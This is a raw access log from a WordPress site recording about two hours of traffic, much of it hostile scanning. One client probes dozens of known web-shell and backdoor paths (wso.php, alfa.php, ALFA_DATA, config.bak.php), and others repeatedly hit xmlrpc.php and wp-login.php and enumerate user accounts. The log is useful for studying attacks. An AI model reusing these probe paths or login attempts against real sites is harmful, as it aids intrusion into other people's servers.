185.72.199.86 - - [08/Jan/2023:11:13:03 -0800] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "gatipackers.com"
185.72.199.86 - - [08/Jan/2023:11:13:04 -0800] "GET / HTTP/1.1" 200 26864 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "gatipackers.com"
10.213.116.209 - - [08/Jan/2023:11:13:07 -0800] "POST /wp-cron.php?doing_wp_cron=1673205187.5479969978332519531250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673205187.5479969978332519531250" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
185.72.199.86 - - [08/Jan/2023:11:13:19 -0800] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 26215 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "gatipackers.com"
185.76.77.160 - - [08/Jan/2023:11:14:17 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
118.184.177.45 - - [08/Jan/2023:11:17:32 -0800] "GET / HTTP/1.1" 200 26945 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:36 -0800] "GET /wp-load.php HTTP/1.1" 200 - "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:39 -0800] "GET /wp-load.php HTTP/1.1" 200 - "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:43 -0800] "GET /style.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:43 -0800] "GET /wp-admin/style.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:43 -0800] "GET /s_e.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:44 -0800] "GET /s_ne.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:44 -0800] "GET /1index.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:45 -0800] "GET /radio.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:45 -0800] "GET /doc.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:46 -0800] "GET /wp_wrong_datlib.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:46 -0800] "GET /beence.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:46 -0800] "GET /ups.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:47 -0800] "GET /wp-signin.php?dizo&ping HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:47 -0800] "GET /media-admin.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:48 -0800] "GET /export.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:48 -0800] "GET /wp-content/export.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:48 -0800] "GET /wp-includes/wp-class.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:49 -0800] "GET /wp-includes/wp-atom.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:49 -0800] "GET /wp-includes/images/css.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:50 -0800] "GET /wp-includes/css/css.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:50 -0800] "GET /defau1t.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:51 -0800] "GET /moduless.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:51 -0800] "GET /wp-booking.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:51 -0800] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:52 -0800] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:52 -0800] "GET /wp-includes/css/wp-config.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:52 -0800] "GET /config.bak.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:53 -0800] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:53 -0800] "GET /legion.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:54 -0800] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:54 -0800] "GET /wp-plugins.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:56 -0800] "GET /gank.php.PhP HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:56 -0800] "GET /wp-content/db-cache.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:57 -0800] "GET /archives.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:57 -0800] "GET /defau11.php HTTP/1.1" 404 88 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:57 -0800] "GET /wp-content/outcms.php?up HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:58 -0800] "GET /system_log.php?bala=up HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:58 -0800] "GET /wp-backup-sql-302.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:59 -0800] "GET /error.php?phpshells HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:59 -0800] "GET /ALFA_DATA HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:19:59 -0800] "GET /alfacgiapi HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:00 -0800] "GET /cgialfa HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:01 -0800] "GET /wp-content/uploads/ALFA_DATA HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:02 -0800] "GET /wp-content/uploads/alfacgiapi HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:02 -0800] "GET /wp-content/uploads/cgialfa HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:02 -0800] "GET /wp-includes/ALFA_DATA HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:03 -0800] "GET /wp-includes/alfacgiapi HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:03 -0800] "GET /wp-includes/cgialfa HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:04 -0800] "GET /wp-admin/ALFA_DATA HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:04 -0800] "GET /wp-admin/alfacgiapi HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:04 -0800] "GET /wp-admin/cgialfa HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:05 -0800] "GET /wp-content/ALFA_DATA HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:05 -0800] "GET /wp-content/alfacgiapi HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:05 -0800] "GET /wp-content/cgialfa HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:06 -0800] "GET /templates/beez3/ALFA_DATA HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:06 -0800] "GET /templates/beez3/alfacgiapi HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:07 -0800] "GET /templates/beez3/cgialfa HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:07 -0800] "GET /sites/default/files/ALFA_DATA HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:07 -0800] "GET /sites/default/files/alfacgiapi HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:08 -0800] "GET /sites/default/files/cgialfa HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:08 -0800] "GET /admin/controller/extension/extension/ALFA_DATA HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:09 -0800] "GET /admin/controller/extension/extension/alfacgiapi HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:09 -0800] "GET /admin/controller/extension/extension/cgialfa HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:10 -0800] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:10 -0800] "GET /index.php?3x=3x HTTP/1.1" 200 26864 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:12 -0800] "GET /olux.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:12 -0800] "GET /xleet.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:13 -0800] "GET /wso.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:13 -0800] "GET /shell.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:13 -0800] "GET /up.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:13 -0800] "GET /upload.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:14 -0800] "GET /1.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:14 -0800] "GET /x.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:14 -0800] "GET /z.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:14 -0800] "GET /a.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:14 -0800] "GET /test.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:15 -0800] "GET /wp.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:15 -0800] "GET /alfa.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:15 -0800] "GET /config.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:15 -0800] "GET /templates/beez3/index.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:15 -0800] "GET /about.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
52.146.6.194 - - [08/Jan/2023:11:20:16 -0800] "GET /shells.php HTTP/1.1" 404 88 "www.bing.com" "wp_is_mobile" "gatipackers.com"
190.92.137.165 - - [08/Jan/2023:11:21:31 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
31.28.31.107 - - [08/Jan/2023:11:29:31 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.209 - - [08/Jan/2023:11:29:35 -0800] "POST /wp-cron.php?doing_wp_cron=1673206175.6664450168609619140625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673206175.6664450168609619140625" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
193.56.113.24 - - [08/Jan/2023:11:29:57 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
190.92.137.177 - - [08/Jan/2023:11:37:02 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
193.56.113.19 - - [08/Jan/2023:11:41:05 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
193.56.113.19 - - [08/Jan/2023:11:41:10 -0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
193.56.113.19 - - [08/Jan/2023:11:41:10 -0800] "GET /wp-login.php HTTP/1.1" 200 6550 "http://gatipackers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
10.213.116.211 - - [08/Jan/2023:11:41:08 -0800] "POST /wp-cron.php?doing_wp_cron=1673206868.6859118938446044921875 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673206868.6859118938446044921875" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
193.56.113.19 - - [08/Jan/2023:11:41:13 -0800] "POST /wp-login.php HTTP/1.1" 200 6943 "http://gatipackers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
46.166.171.186 - - [08/Jan/2023:11:41:41 -0800] "POST /wp-login.php HTTP/1.1" 200 6924 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" "gatipackers.com"
198.235.24.163 - - [08/Jan/2023:11:42:28 -0800] "GET / HTTP/1.1" 200 26892 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "gatipackers.com"
95.158.43.17 - - [08/Jan/2023:11:44:24 -0800] "GET /home/request_a_survey/ HTTP/1.1" 200 779 "http://gatipackers.com/home/request_a_survey/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
95.158.43.17 - - [08/Jan/2023:11:44:24 -0800] "GET / HTTP/1.1" 200 26864 "http://gatipackers.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
95.158.43.17 - - [08/Jan/2023:11:44:29 -0800] "GET /index.php/2021/02/26/sample-page/ HTTP/1.1" 200 26215 "http://gatipackers.com/index.php/2021/02/26/sample-page/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42" "gatipackers.com"
81.88.52.134 - - [08/Jan/2023:11:45:12 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
180.211.97.53 - - [08/Jan/2023:11:53:11 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.209 - - [08/Jan/2023:11:53:15 -0800] "POST /wp-cron.php?doing_wp_cron=1673207595.6444680690765380859375 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673207595.6444680690765380859375" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
72.18.132.9 - - [08/Jan/2023:12:01:04 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
118.184.177.45 - - [08/Jan/2023:12:04:44 -0800] "GET / HTTP/1.1" 200 26945 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.gatipackers.com"
180.211.97.53 - - [08/Jan/2023:12:09:04 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.209 - - [08/Jan/2023:12:09:08 -0800] "POST /wp-cron.php?doing_wp_cron=1673208548.0233290195465087890625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673208548.0233290195465087890625" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
54.37.74.123 - - [08/Jan/2023:12:17:21 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
196.196.203.142 - - [08/Jan/2023:12:22:23 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
196.196.203.142 - - [08/Jan/2023:12:22:29 -0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
10.213.116.211 - - [08/Jan/2023:12:22:27 -0800] "POST /wp-cron.php?doing_wp_cron=1673209347.7220680713653564453125 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673209347.7220680713653564453125" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
173.82.78.214 - - [08/Jan/2023:12:25:52 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
120.76.135.15 - - [08/Jan/2023:12:33:48 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
23.254.82.122 - - [08/Jan/2023:12:34:23 -0800] "GET /contact_us HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2952.95 Safari/537.36" "gatipackers.com"
139.59.31.73 - - [08/Jan/2023:12:42:18 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.210 - - [08/Jan/2023:12:42:21 -0800] "POST /wp-cron.php?doing_wp_cron=1673210541.5999979972839355468750 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673210541.5999979972839355468750" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
159.89.168.53 - - [08/Jan/2023:12:44:02 -0800] "HEAD / HTTP/1.1" 200 - "https://www.bing.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "gatipackers.com"
159.89.168.53 - - [08/Jan/2023:12:45:00 -0800] "GET /blog/wp-login.php HTTP/1.1" 404 88 "http://gatipackers.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "gatipackers.com"
159.89.168.53 - - [08/Jan/2023:12:45:00 -0800] "GET /wp/wp-login.php HTTP/1.1" 404 88 "http://gatipackers.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "gatipackers.com"
31.172.80.137 - - [08/Jan/2023:12:48:56 -0800] "POST /wp-login.php HTTP/1.1" 200 6919 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "gatipackers.com"
178.128.104.173 - - [08/Jan/2023:12:50:26 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
196.244.191.94 - - [08/Jan/2023:12:50:48 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
196.244.191.94 - - [08/Jan/2023:12:50:51 -0800] "POST /xmlrpc.php HTTP/1.1" 200 403 "http://gatipackers.com/xmlrpc.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
212.192.24.22 - - [08/Jan/2023:12:59:19 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.210 - - [08/Jan/2023:12:59:23 -0800] "POST /wp-cron.php?doing_wp_cron=1673211563.1190149784088134765625 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673211563.1190149784088134765625" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
196.244.191.150 - - [08/Jan/2023:13:00:52 -0800] "GET /?author=1 HTTP/1.1" 200 26590 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3198.0 Safari/537.36 OPR/49.0.2711.0" "gatipackers.com"
139.64.239.230 - - [08/Jan/2023:13:07:32 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.210 - - [08/Jan/2023:13:07:36 -0800] "POST /wp-cron.php?doing_wp_cron=1673212056.3742489814758300781250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673212056.3742489814758300781250" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
47.241.15.39 - - [08/Jan/2023:13:16:19 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
